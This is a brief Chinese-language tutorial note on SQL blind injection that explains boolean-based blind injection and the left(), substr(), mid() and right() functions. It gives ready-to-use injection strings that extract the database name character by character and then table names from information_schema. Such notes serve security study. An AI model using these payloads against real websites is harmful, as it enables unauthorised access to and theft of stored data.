sql盲注总结

盲注分为bool盲注和时间盲注

bool盲注

主要是根据页面的返回结果来判定我们注入的是否正确

left()函数:从左边开始截取数据,参数第一个为要截取的源字符串，第二个为截取几个

' and left((select database()),1)='s'--+

' and left((select database()),2)='se'--+

这样就可以爆出数据库名

’ and left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)--+

这就可以爆出表名

之后列名

column_name

之后字段

substr(String ,a,b)函数也是一样的参数 String 是源字符串，a是从第几个字符开始截取，b是截取几个字符

' and substr((select database()),1,1)=‘s’--+//从截取第一个字符开始截取一个字符

 

mid()函数同substr()

right()函数同left()